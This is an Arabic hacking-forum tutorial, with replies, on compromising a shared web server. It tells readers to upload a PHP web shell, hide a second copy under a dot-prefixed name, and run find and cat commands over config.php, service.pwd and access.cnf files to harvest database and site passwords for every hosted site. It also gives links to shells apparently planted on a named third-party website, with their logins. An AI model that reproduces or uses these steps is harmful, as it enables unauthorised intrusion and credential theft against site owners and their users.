طريقة اختراق السيرفرات .. نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر.. وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا قم بتحميل سكربت الشيل بلغة php على جهازك وهذي وصلة الشيل.. (( متطور )) http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip ------------------------------------------------------------------------------ بسم الله نبدأ في الشرح ::-- البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php )) وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config للتي على السيرفر.. ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell على موقعك او الموقع الذي اخترقته.. ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا .. وللتوضيح اكثر.. نفترض انك اخترقت الموقع http://www.usa.com/ وقمت بتحميل الــ phpshell على ملف download فسيصبح العنوان www.USA.com/download/phpshell.php وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ في الفراغ هذا سوف نضع فيه اوامر اللينكس.. ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::-- يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط.. ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/download/phpshell.php wget وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد.. --------------------------------------------- ندخل الى موضوعنا والان بعد تحميل الشيل على الموقع يصبح العنوان مثلا www.USA.com/download/phpshell.php وثم نجد كتابة اسمها Command وامامها فراغ في الفراغ هذا ندخل اوامر اللينكس عليه.. وندخل الامر هذا مثلا ls /var/named وهو لاحضار جميع المواقع التي على السيرفر.. ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود ((safe mode)) =============---==-- شرح الاوامر --==--============== الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات )) 1- قواعد البيانات اكتب هذا الامر امام النص Command في الفراغ المقابل له اكتب هذا الامر find / -name config.php الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا : usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php (( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع )) ونلاحظ ان التي باللون الزهري هي الموقع.. طيب نبي نقرأ الي متكوب داخل الملف هذا usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php ونلاحظ ان الموقع هو http://www.ainvar.net/ والمنتدى من نوعية phpBB المهم نبي نقرأ الي بداخله.. نكتب الامر هذا cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php وثم راح يطلع لك ملف الــ config.php وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup ------------------------------------------------------- الان انتهينا من قاعدة البيانات باقي باسوردات المواقع.. اكتب امام Command في الفراغ نكتب هذا الامر find / -name service.pwd وراح يطلع لنا المواقع بالشكل ذا : usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd التي باللون الزهري هي المواقع... طيب الان ابي استعرض الباسورد للموقع usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd راح نكتب الامر هذا cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd وراح يجينا الباسورد للموقع ومشفر بمقياس DES ---------------------------------------------------------- طيب يوجد طريقة اخرى افضل من ذلك نكتب الامر هذا cat /home/*/public_html/_vti_pvt/service.pwd او cat /home/*/public_html/_vti_pvt/access.cnf وراح يجينا الباسوردات لكل المواقع.. ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها .. او قول لي وانا اعطيك افضلها واغلبها.. وهذه بعض اوامر اللينكس cat /home/*/public_html/vb/admin/config.php لاحضار باسوردات المنتديات من نوع vb cat /home/*/public_html/phpbb/config.php لاحضار باسوردات المنتديات من نوع phpBB cat /home/*/public_html/forum/config.php لاحضار باسوردات المنتديات من نوع asp وطبعا الباسوردات لقاعدة البيانات ولاكنك تلاحظ ان الاوامر يوجد فيها علامة نجمه * وهذه تعني احضار الباسورد لكل المواقع.. وهذا سكربت ممتاز.. شباب السكربت لــ Php Shell الي انا نزلته فوق.. الي قلت لكم تحملونه .. هذاك سكربت متطور جدا وجديد وهو بلغة php الي هو هذا http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip في الحقيقه ماستخدمته ويقولون انه ممتاز جدا جدا ومتطوووووور جدا جدا ولاكن يوجد سكربت اخر لــ PhpShell وهو لــ php وفي الحقيقة هو هذا الي استخدمه انا داااائمااا ----------------------------------------------- للتحميل (( كليك يمين وحفظ الهدف بااسم )) http://www.gimpster.com/downloads/p...hell-latest.zip الملف يحتوي علي التالي phpshell.php: هذا هو السكربت ChangeLog: هنا سوف تجد بعض الميزات التي اضيفت الي هذا الاصدار README: هذا ملف فيه الشرح والتعليمات (( اعتقد ان شرحي افضل منه )) INSTALL: هذا الملف يخبرك عن كيفية حماية الphp shell بباسوورد واخيرا جبت لكم مووقع اخترقه واحد يقاله شبح الليل.. من فريق عمل منتدى الليزر.. منزل لكم شيل على الموقع الي هو مخترقه.. 4 شيلات المهم انا اخذتها من المنتدى وحطيتها هنا عشان تستفيدون وتطبقون الاوامر عليه وتعرفون كيف.. 1- الشيل الاول وهذا رابط شيل قد وجته ووجدت ايضا اليوز وبالباس اليوزر : lezr الباسورد : lezr_vb http://www.tribal-vision.com/images/tv_lar.php ---------------------------------------- 2- الشيل الثاني (( ممتاز جدا )) http://www.tribal-vision.com/images/tv_la1.php اليوزر : root لايوجد باسورد بس اكتب اليوزر وثم ادخل على طوول ----------------------------------- 3- الشيل الثالث http://www.tribal-vision.com/images/tv_la2.php ---------------------------------- 4- الشيل الرابع http://www.tribal-vision.com/images/triebes.php
فيديو اليوم اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له . سجل إختراقك الأن في Aljyyosh.org بمميزات عديده من مواضيعي: 1 - عمل ايميل ياهو - ياهو 2 - عمل ايميل - انشاء ايميل 3 - كيف اسوي ايميل - انشاء ايميل 4 - تحميل الياهو 5 - برامج حماية 6 - دورة اختراق المواقع 7 - فتح المواقع المحجوبة 8 - لعبة فيفا 2012 9 - لعبة كاونتر سترايك 10 - لعبة GTA San Andreas 11 - استعادة الملفات 12 - فك الضغط 11 - لعبة صلاح الدين 12 - لعبة فاي ستي 13 - لعبة pes 2012 14 - عمل فيس بوك - فيس بوك 15 - فوتو فونيا - photofunia 2012 16 - برنامج تشارلز - برنامج Charles 17 - تحميل برنامج داون لود مانجر 18 - برنامج Internet Download Manager 19 - تحميل انترنت اكسبلورر 20 - لعبة جاتا - تحميل لعبة جاتا - لعبة gta 21 - لعبة نيد فور سبيد - لعبة need for speed 22 - لعبة كراش - لعبة crash 23 - لعبة ماين كرافت - لعبة MineCraft 24 - برامج - تحميل برامج - تحميل العاب 25 - تحميل برنامج محول الصوتيات 26 - برنامج تركيب الصور 27 - كراك idm 28 - تحميل كاسبر سكاي 29 - تحميل ماسنجر بلس 30 - برنامج تسريع النت سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ
شكرا لك اخي بس كيف تخترق السيرفر هذا هو المشكل
بارك الله فيك
والله شرح رائع بس رابط الشل خطا
وواللللللله كبير والله كبير والله كبير
mercccccccccciiiiiiiiiiiiiiiii
merccccccccccccccccccccccciiiiiiiiiiiiiiiii
k,yhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
This is the first book available for the Metasploit Framework (MSF),
قوانين المنتدى